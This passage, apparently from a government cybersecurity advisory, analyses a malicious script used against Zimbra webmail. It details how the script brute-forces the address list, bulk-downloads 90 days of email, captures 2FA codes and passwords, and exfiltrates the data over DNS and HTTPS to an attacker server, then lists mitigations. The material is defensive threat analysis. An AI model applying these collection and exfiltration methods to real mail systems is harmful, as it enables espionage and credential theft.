<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>gather_device_status </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>GetOAuthConsumersRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>zimbraAccount </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>gather_oauth_consumers </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>SearchGalRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>zimbraAccount </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>gather_gal </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p>The script attempts to collect the victim’s GAL through brute force by searching for each two-character combination from a character set of “abcdefghijklmnopqrstuvwxyz1234567890.-_”. These queries are conducted using 20 batches of SOAP requests with 77 “SearchGalRequest” SOAP commands in each batch except for the last request containing only 58.</p>
<p>During the <em>gather_environment</em> stage, the script attempts to determine which type of ZCS webmail client the victim is using. The script checks the user’s current URL to determine the client type being used, checking for certain indicators (shown in <a href="https://www.cisa.gov/#table2"><strong>Table 2</strong></a>) to determine the client type. The corresponding value is then used as the payload when exfiltrating the client type.</p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 2: ZCS webmail client types</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p><strong>Indicator </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p><strong>Client Type </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p><strong>Associated Value </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>?client=advanced </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>Advanced </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>c </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>/h/ </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>Standard </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>h </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>/modern/ </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>Modern </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>m </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p>As part of collection, the script attempts to harvest any emails not marked as “junk” from the last 90 days from the victim’s account. Emails are collected daily by an HTTP GET request to the URL path, “/home/~/?fmt=tgz&amp;meta=0&amp;query=date:-{DAY_OFFSET}d AND (not in:junk)”. The <em>{DAY_OFFSET}</em> value would be between 0 and 89 representing how many days ago the email was sent or received. To prevent redundant collection and exfiltration of emails, a variable with a name based on the email date being queried, using a format of <em>zd_comp_YYYY-MM-DD</em>, and value of <em>true</em>, is saved to the <em>window.top.localStorage</em> property. This variable is saved regardless of whether the email is successfully exfiltrated.  </p>
<p>According to Mozilla documentation, if the user is not in a private browsing session, any data stored to localStorage does not typically expire. This means that if the user happens to execute the script again from the same computer, the script avoids attempting to re-exfiltrate previously captured emails. However, the script always attempts to pull any emails with a <em>{DAY_OFFSET} </em>of zero. In other words, the script always pulls emails sent or received the same day it is run. After email results are returned from the query for each day of email activity, those results are then passed to Flowerbed as described in the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section.</p>
<p>The script also provides LAUNDRY BEAR with telemetry on any errors that occur during the collection process. This is accomplished by executing any collection or exfiltration code through helper functions that contain error handling logic. If an error occurs, a payload containing information on the error itself, the context of the error happening, and the stage in which the error occurred is sent to Flowerbed as described in the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section below. For cases where the error occurs within a SOAP request, “:api” is concatenated to the stage value in the payload. If an error occurs during the batch SOAP requests that occur when collecting the GAL of the victim, the stage value will use a format of <em>gather_gal:{VAL}:api</em>. The <em>{VAL}</em> placeholder indicates which batch request, a number from 0 to 19, the error occurred in. Errors that occur during the password autocomplete interception process will use “gather_autocomplete_password:dom” for the stage value. Finally, if an error occurs when attempting to collect or exfiltrate a specific day’s emails, the stage will include which day the error occurred on, using the previously defined placeholder <em>{DAY_OFFSET},</em> with a format of <em>sendArchive:day-{DAY_OFFSET}</em>.</p>
<h3><em><strong>Exfiltration</strong></em><a class="ck-anchor"></a></h3>
<p>At the end of each stage in the collection process, the script attempts to exfiltrate acquired information to Flowerbed. The script primarily relies on two forms of data exfiltration: DNS [<a href="https://attack.mitre.org/versions/v19/techniques/T1048/003/" target="_blank">T1048.003</a>] and HTTPS. Some information is exfiltrated over both the DNS and HTTPS channels.</p>
<p>Prior to exfiltration, a randomized 10- or 11-character alphanumeric string is generated as an identifier for the victim. This identifier is included in the URL of both the DNS- and HTTPS-based exfiltration.  </p>
<h4><strong>DNS exfiltration</strong></h4>
<p>DNS exfiltration occurs through DNS A record queries. To ensure data exfiltrated through DNS is not corrupted when traversing through non-actor-controlled DNS infrastructure, <em>Ulej </em>maintains compliance with RFC 1035, Domain Names - Implementation and Specification, specifically accounting for the case insensitivity and subdomain length requirements. Base32 encoding is used to create a case-insensitive payload. Once the payload is encoded, a period (“.”) is added every 60 characters to ensure each subdomain is under 63 characters long. The script then creates a new image object sourced from a URL with the scheme defined in <a href="https://www.cisa.gov/#figure6"><strong>Figure 6</strong></a>. Any traffic involving DNS exfiltration will have “d-“ prefixing the victim identifier, and the subdomain immediately following indicates the type of information being exfiltrated.</p>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/Figure6.png?itok=Tv8RT8o8" width="1024" height="49" alt="Figure 6: Structure for information exfiltrated by DNS">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 6: Structure for information exfiltrated by DNS</strong></em></figcaption>
  </figure>
<p>When the script generates an image object, the browser tries to retrieve the complete domain of the URL specified as the source of the image. This triggers a DNS request sent to the actor-controlled server and processed by Flowerbed. <a href="https://www.cisa.gov/#table3"><strong>Table 3</strong></a> lists both the information exfiltrated via DNS and their corresponding data type identifiers in the DNS queries.  </p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 3: DNS exfiltration</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p><strong>Type of Information </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p><strong>Exfiltration Stage </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p><strong>Data Type </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Victim’s Email Address </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_email </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>e </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Client Type </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>c </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Zimbra Version </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_environment  </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>v </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>URL at Time of Exploitation </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>url </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>2FA Scratch Codes </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_2fa_codes </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>2fa </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Newly Created Application Password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_app_password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>pa </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Harvested Autocomplete Password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_autocomplete_password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>pw </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<h4><strong>HTTPS exfiltration</strong></h4>
<p>Any information exfiltrated via DNS is also exfiltrated through HTTPS, as well as additional data including email content, contacts, attachments, and error logging information. By using Let’s Encrypt certificates, this group can quickly deploy new infrastructure and leverage encrypted HTTPS communications with valid server certificates when exfiltrating information from the victim’s environment. The HTTPS exfiltration capability only uses two HTTP content types, defined in <a href="https://www.cisa.gov/#table4"><strong>Table 4</strong></a>. Traffic associated with HTTPS exfiltration will use the URL scheme shown in <a href="https://www.cisa.gov/#figure7"><strong>Figure 7</strong></a>.  </p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 4: HTTPS exfiltration types</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p><strong>Content Type </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p><strong>URL Path </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p>application/json </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p>/v/p </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p>application/octet-stream </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p>/v/d </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/Figure%207.png?itok=CdTcyMdN" width="1024" height="50" alt="Figure 7: Structure for information exfiltrated by HTTPS">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 7: Structure for information exfiltrated by HTTPS</strong></em></figcaption>
  </figure>
<p>Some of the data transmitted via HTTPS uses the standard JSON content type format. The script includes the information in a POST request to actor-controlled infrastructure.  </p>
<p><a href="https://www.cisa.gov/#table5"><strong>Table 5</strong></a> provides a summary of the JSON-based exfiltration.</p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 5: HTTPS JSON exfiltration  </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p><strong>Type of Information </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p><strong>Exfiltration Stage </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p><strong>JSON Key(s) </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>Victim’s Email Address </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>gather_email </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>email </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>Client Type, Version, and Current URL </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>client, version, full_url </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>Newly Created Application Password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>gather_app_password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>app_password </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>Harvested Autocomplete Password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>gather_autocomplete_password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>autocomplete_password </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p>The script transmits all HTTPS exfiltration not identified in <a href="https://www.cisa.gov/#table5"><strong>Table 5</strong></a> using the Octet-Stream content type as binary data. The POST requests for this method include a filename in the “X-Filename” header. Traditionally, developers use headers prefixed with “X-” to denote custom headers that do not follow a defined standard. The purpose of including this header remains unclear since the Catcher capability ignores the provided filename when saving the data. <a href="https://www.cisa.gov/#table6"><strong>Table 6</strong></a> summarizes the data exfiltrated in this format.</p>
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<div class="TableContainer Ltr SCXW189907655 BCX8">
<div class="WACAltTextDescribedBy SCXW189907655 BCX8"><a class="ck-anchor"></a></div>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong> Table 6: HTTPS binary exfiltration</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p><strong>Type of Information </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p><strong>Exfiltration Stage </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p><strong>X-Filename Header </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>SOAP request for GetInfoRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>zimbra_batch_analytics.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>SOAP request for GetScratchCodesRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_2fa_codes </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>zimbra_batch_analytics.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>SOAP request for GetDeviceStatusRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_device_status </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>zimbra_batch_analytics.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>SOAP request for GetOAuthConsumersRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_oauth_consumers </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>zimbra_batch_analytics.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>Victim Organization’s Global Address List </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_gal </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>telemetry_{1-20}.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>Last 90 Days of Victim’s Emails </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>sendArchives </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>telemetryData_{0-89}.json </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<p>The script sends all exfiltrated data identified in <a href="https://www.cisa.gov/#table6"><strong>Table 6</strong></a> to the Catcher service exactly as received from the SOAP request in a JSON payload, except for email exfiltration. For email exfiltration, the script sends it as a GZIP compressed archive [<a href="https://attack.mitre.org/versions/v19/techniques/T1560/" target="_blank">T1560</a>]. Although most of the exfiltration consists of valid JSON, the script still attempts to exfiltrate all information identified in <a href="https://www.cisa.gov/#table6"><strong>Table 6</strong></a> using the application/octet-stream content typing rather than application/json.</p>
<p>At the beginning and end of the collection and exfiltration activity, during the <em>sendStartPing</em> and <em>sendFinishPing </em>stages respectively, the script submits a POST request with a JSON payload to indicate that the script is starting or finishing execution. Throughout execution, the script also logs error events and send the logs using similar JSON payloads. The script sends the JSON in a POST request to the URL documented in <a href="https://www.cisa.gov/#figure2"><strong>Figure 2</strong></a>, using a URL path of “/v/p” and with a “subtype” key that shows which type of action it logged (<em>start, finish, or error</em>).  </p>
<h4><strong>Catcher</strong></h4>
<p><em>Ulej </em>exfiltrates information to Flowerbed to be handled by a service named Catcher. Catcher is a containerized Python application, running in Docker as part of Flowerbed, which is detailed in the <a href="https://www.cisa.gov/#resourcedev1">Resource development</a> section. It receives exfiltrated data and temporarily stores it, enabling its eventual transfer to infrastructure designed for long-term, secure storage.</p>
<p>Catcher acts as an HTTP server over port 8000 and a DNS server on port 53. As described in the <a href="https://www.cisa.gov/#resourcedev1">Resource development</a> section, the Flowerbed project uses an additional Docker container running an Nginx reverse proxy to enable HTTPS support. This reverse proxy uses a certificate generated by Let’s Encrypt and forwards all traffic with an SNI containing “*.i.*” to port 8000 within the Catcher container.</p>
<p>The DNS service can accept A, AAAA, MX, TXT, and CAA queries. For any MX, AAAA, or CAA queries, the server will always provide an empty response. The system only supports TXT records as needed to process Automatic Certificate Management Environment (ACME) requests, which enable the assignment of Let’s Encrypt certificates. If the server receives an A query, Catcher will always respond with the public IP address of the Flowerbed server.  </p>
<p>However, if a query includes a domain formatted as shown in <a href="https://www.cisa.gov/#figure6"><strong>Figure 6</strong></a> and <a href="https://www.cisa.gov/#figure7"><strong>Figure 7</strong></a>, the service saves a log file in JSON format to disk containing the following details of the DNS query:</p>
<ul>
<li>Time of query,</li>
<li>Source IP address for query,</li>
<li>Queried domain, and</li>
<li>Type of query.</li>
</ul>
<p>The HTTP server typically responds with OK, except in cases where the path is “pixel.gif” when the response contains a 1x1 gif image with a SHA-256 hash of ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629. Like the DNS service, the HTTP service will only log entries when the domain found in the host header of the request follows the expected formatting as seen in <a href="https://www.cisa.gov/#figure6"><strong>Figure 6</strong></a> and <a href="https://www.cisa.gov/#figure7"><strong>Figure 7</strong></a>. As the HTTPS exfiltration uses non-standardized binary and JSON-formatted payloads when exfiltrating to Catcher, Catcher will check the content type of the request. If the content type is set to “application/json”, Catcher encodes the data in Base64 and includes it in the JSON log entry written to disk. If the content type is set to any other value, Catcher leaves the Base64 payload in the JSON log entry blank and saves the payload to a separate file with the same filename as the JSON log entry with a “.bin” file extension. An HTTPS exfiltration event causes Catcher to save a JSON formatted log file to disk containing the following information from the HTTP request:</p>
<ul>
<li>Time,</li>
<li>Source IP address,</li>
<li>Request method,</li>
<li>Host,</li>
<li>Path,</li>
<li>Query string,</li>
<li>Headers, and</li>
<li>Base64 payload.</li>
</ul>
<p>These JSON event log files and binary output files are then initially saved to the directory <em>/root/hits/tmp</em> and later moved to the <em>/root/hits/ready</em> directory once processed. This prevents incomplete files, which are still being uploaded to Catcher, from premature exfiltration from the server. Approximately every 60 seconds, a likely automated workflow establishes a Secure Shell (SSH) connection with the server hosting Flowerbed for a few seconds, almost certainly exfiltrating the data processed by Catcher to non-public-facing infrastructure. The command in <a href="https://www.cisa.gov/#figure8"><strong>Figure 8</strong></a> also executes hourly to remove all files last modified at least two days ago from the <em>/root/hits/ready</em> directory.</p>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/Figure%208-Command%20used%20for%20automated%20directory%20cleanup.png?itok=IqvZvbLK" width="1024" height="92" alt="Figure 8: Command used for automated directory cleanup">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 8: Command used for automated directory cleanup</strong></em></figcaption>
  </figure>
<h2><strong>Response strategies</strong></h2>
<h3><em><strong>Mitigations</strong></em><a class="ck-anchor"></a></h3>
<p>In many cases, by the time an organization identifies a compromise related to this campaign, numerous sensitive and proprietary emails have already been exfiltrated. The significant risk posed by this cyber threat emphasizes the importance for organizations that use ZCS and other similar webmail solutions to take proactive steps to mitigate this risk.</p>
<p>All organizations that use the ZCS webmail service should <strong>immediately prioritize</strong> ensuring that their ZCS is not running a vulnerable version. A patch for <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a> was released for both 10.1.13 and 10.0.18 versions of ZCS [<a href="https://d3fend.mitre.org/technique/d3f:ApplicationHardening">D3-AH</a>]. If immediate patching is not feasible, organizations should advise employees to use alternative mail clients to access email and avoid using the Classic ZCS webmail client until ZCS is updated to a non-vulnerable version [<a href="https://d3fend.mitre.org/tactic/d3f:Isolate/" target="_blank">d3f:Isolate</a>].</p>
<p>System administrators should closely monitor any Internet-connected ZCS or other email systems and the workstations that access those systems and promptly apply available software updates [<a href="https://d3fend.mitre.org/technique/d3f:ApplicationHardening" target="_blank">D3-AH</a>]. Administrators can maintain awareness of active vulnerability exploitation by referencing open source resources, including <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">CISA’s Known Exploited Vulnerabilities Catalog</a> and <a href="https://www.ncsc.gov.uk/collection/vulnerability-management/guidance/responding-to-active-exploitation" target="_blank">NCSC-UK’s Responding to active exploitation of vulnerabilities</a> guidance.</p>
<p>Organizations should consider using a third-party authentication service that supports passkeys for authentication to mediate access to ZCS and other services that do not natively support passkeys. By doing so, organizations can work to eliminate the possibility of automated password collection from autocomplete or password reuse [<a href="https://d3fend.mitre.org/technique/d3f:CredentialHardening" target="_blank">D3-CH</a>]. However, Application Passcodes may still be necessary and should be monitored closely.  </p>
<p>Organizations should implement network monitoring capabilities with collection and short-term retention of packet capture or NetFlow data and maintain log collection and storage [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#MaintainLogCollectionStorage3Q">CPG 3.Q</a>]. This will allow organizations to monitor for and identify suspicious network activity [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#IdentifyAdverseEvents4B">CPG 4.B</a>], such as:</p>
<ul>
<li>Significant amounts of outbound data being sent to IPs associated with VPS providers not used by the organization [<a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis" target="_blank">D3-NTA</a>];</li>
<li>Frequent DNS queries for a suspicious domain with seemingly random subdomains [<a href="https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis" target="_blank">D3-DNSTA</a>];</li>
<li>A sudden spike of connections to a server associated with a recently established domain [<a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation">D3-NTCD</a>]; and  </li>
<li>Connections to internal services, such as webmail, from VPN providers frequently leveraged by this group for nefarious activity, such as Mullvad VPN [<a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation">D3-NTCD</a>].</li>
